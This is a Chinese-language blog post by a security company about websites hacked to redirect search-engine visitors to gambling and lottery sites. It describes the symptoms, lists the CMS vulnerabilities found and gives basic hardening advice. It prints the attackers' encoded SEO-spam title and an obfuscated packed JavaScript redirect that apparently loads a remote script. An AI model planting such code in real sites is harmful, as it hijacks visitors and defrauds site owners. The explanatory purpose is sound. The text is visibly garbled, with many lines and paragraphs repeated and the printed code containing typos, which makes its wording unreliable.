最近一段時間,我們eSafe白帽資安網公司一連接到數十個公司網站被跳轉到彩票,博彩網
站上去,客戶反映從百度搜索網站進去,直接跳轉到彩票網站上,直接輸入網址沒有跳轉,
導致客戶網站的流量急劇下滑,做的百度推廣跟搜狗推廣,都給彩票網站做廣告了,公司領
導高度重視網站安全的問題,因為給公司的形象以及名譽帶來的損失太大了,我們安排安全
技術人員對其網站進行全面的網站安全檢測,對網站存在的漏洞,以及木馬後門進行全面的
清除與漏洞修復,安全加固。關於網站被跳轉到彩票、博彩網站的問題,整理一份詳細的處
理過程,希望幫到更多遇到這種情況的站長,以及公司網站運營者。
網站被跳轉彩票網站問題分析
我們eSafe白帽資安網跟公司網站負責人進行了詳細的主機信息(主機IP 遠程端口 管理員賬號
密碼、SSH端口、root賬號密碼),網站信息包括FTP賬號密碼的對接,由安全部署部門技
術對網站的代碼以及主機系統進行縝密的安全檢測與分析。
密碼、SSH端口、root賬號密碼),網站信息包括FTP賬號密碼的對接,由安全部署部門技
術對網站的代碼以及主機系統進行縝密的安全檢測與分析。
在整體的安全檢測當中我們發現客戶的網站都存在網站木馬後門,包括php腳本木馬,asp腳
本木馬,jsp腳本木馬,我們通常叫大馬,可以對網站進行惡意篡改,上傳,改名,下載,等
管理員的高權限操作。出現網站被跳轉的客戶,採用的網站架構都是php+mysql架構,以及
jsp+mysql架構,大多數用的是開源程序,像dedecms,織夢系統,phpcms系統,discuz系統。
本木馬,jsp腳本木馬,我們通常叫大馬,可以對網站進行惡意篡改,上傳,改名,下載,等
管理員的高權限操作。出現網站被跳轉的客戶,採用的網站架構都是php+mysql架構,以及
jsp+mysql架構,大多數用的是開源程序,像dedecms,織夢系統,phpcms系統,discuz系統。
由於之前客戶網站總是被跳轉到彩票、賭博網站,客戶只是懂一些簡單的代碼,只能通過篡改
的首頁代碼裡,找到惡意代碼進行刪除,但是治標不治本,沒過幾天網站又被跳轉了,客戶經
常為這些問題煩惱,每天提心吊膽的。其實問題的根本原因在於網站存在漏洞,以及主機安
全沒有做好。我們esafe處理了成千上百的網站,總結的經驗來看,網站首頁被篡改的幾率最大
,都是篡改首頁的標題,描述,以及在首頁頂部添加一些加密的字符,如下圖所示:
的首頁代碼裡,找到惡意代碼進行刪除,但是治標不治本,沒過幾天網站又被跳轉了,客戶經
常為這些問題煩惱,每天提心吊膽的。其實問題的根本原因在於網站存在漏洞,以及主機安
全沒有做好。我們esafe處理了成千上百的網站,總結的經驗來看,網站首頁被篡改的幾率最大
,都是篡改首頁的標題,描述,以及在首頁頂部添加一些加密的字符,如下圖所示:
<title>北京赛车投注平台_&#
21271;京赛车pk10网上开&
#25143;_北京赛车pk10登&#
24405;平台</title><meta name="keywords" content="北京
12;k10开奖直播,pk10
;开奖直播,北京赛车p
;k10开奖结果,北京ย
7;车pk10开奖直播,北
;京赛车pk10历史记ô
05;,北京赛车pk10投૤
0;网站,pk10网上开户
;,pk10网上投注" />
21271;京赛车pk10网上开&
#25143;_北京赛车pk10登&#
24405;平台</title><meta name="keywords" content="北京
12;k10开奖直播,pk10
;开奖直播,北京赛车p
;k10开奖结果,北京ย
7;车pk10开奖直播,北
;京赛车pk10历史记ô
05;,北京赛车pk10投૤
0;网站,pk10网上开户
;,pk10网上投注" />
以上代碼就是被攻擊者添加的加密的標題與描述,解密後發現內容是什麼北京賽車,時時彩,
PK10等賭博內容。還有一個被攻擊的特徵就是在首頁你會發現一段跳轉的代碼,該代碼是根
據搜索引擎的特徵來進行判斷跳轉,比如判斷客戶的訪問來路是通過百度搜索,360搜索,搜
狗搜索來的會直接跳轉到彩票,賭博網站上去。如下代碼:
PK10等賭博內容。還有一個被攻擊的特徵就是在首頁你會發現一段跳轉的代碼,該代碼是根
據搜索引擎的特徵來進行判斷跳轉,比如判斷客戶的訪問來路是通過百度搜索,360搜索,搜
狗搜索來的會直接跳轉到彩票,賭博網站上去。如下代碼:
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c
+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function
(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\
\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0
\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\
7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x
63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|windo
w|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))
+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function
(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\
\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0
\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\
7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x
63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|windo
w|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))
跳轉到的彩票網站如下截圖:
再一個攻擊特徵就是網站在百度裡搜索,出現紅色風險標識, 百度網址安全中心提醒您:
該站點可能受到駭客攻擊,部分頁面已被非法篡改! 紅色提示該百度風險。導致客戶打開網
站直接被百度攔截,如下圖所示:
該站點可能受到駭客攻擊,部分頁面已被非法篡改! 紅色提示該百度風險。導致客戶打開網
站直接被百度攔截,如下圖所示:
百度網址安全中心提醒您:
該站點可能受到駭客攻擊,部分頁面已被非法篡改! 查看詳情
您正在訪問:http://*******.com/
該站點可能由於受到駭客攻擊,部分頁面已被非法篡改,可能會威脅到您的財產和信息安全
,建議您謹慎訪問。
,建議您謹慎訪問。
站點(http://******.com/)發現的非法篡改頁面,可參考以下示例:
被黑網址快照1:http://********.com/011E...
被黑網址快照2:http://********.com/010S...
被黑網址快照3:http://********.com/004G...
針對以上網站被跳轉攻擊的特徵,我們esafe對其進行全面的人工代碼安全審計,以及網
站漏洞檢測,網站木馬後門清理,發現dedecms網站存在sql注入漏洞,以及xss獲取管理
員賬號cookies漏洞,discuz存在getshell漏洞,注入獲取管理員漏洞,discuz上傳繞過漏
洞,針對上述漏洞我們進行了全面的修復,並做了網站安全部署,以及主機安全部署,
網站文件防篡改部署。
站漏洞檢測,網站木馬後門清理,發現dedecms網站存在sql注入漏洞,以及xss獲取管理
員賬號cookies漏洞,discuz存在getshell漏洞,注入獲取管理員漏洞,discuz上傳繞過漏
洞,針對上述漏洞我們進行了全面的修復,並做了網站安全部署,以及主機安全部署,
網站文件防篡改部署。
防止網站被跳轉的解決方法如下:
1.對主機目錄權限的安全部署,對管理員賬號密碼加密,盡可能設置的複雜一些,數
字+大小寫字母+特殊符號,對網站數據庫進行分配普通權限賬號。
字+大小寫字母+特殊符號,對網站數據庫進行分配普通權限賬號。
2.mysql數據庫默認端口3306,改為61116,並加入到端口安全策略,不對外開放,外網
IP無法連接數據庫,只有本地127.0.0.1才能進行連接數據庫,以防止攻擊者惡意猜測。
IP無法連接數據庫,只有本地127.0.0.1才能進行連接數據庫,以防止攻擊者惡意猜測。
3.對主機底層系統進行安全加固,包括遠程端口登錄的安全驗證。
4.對網站代碼進行整體的安全檢測,包括定期的升級網站程序源代碼,修復補丁以及網
站漏洞。
站漏洞。
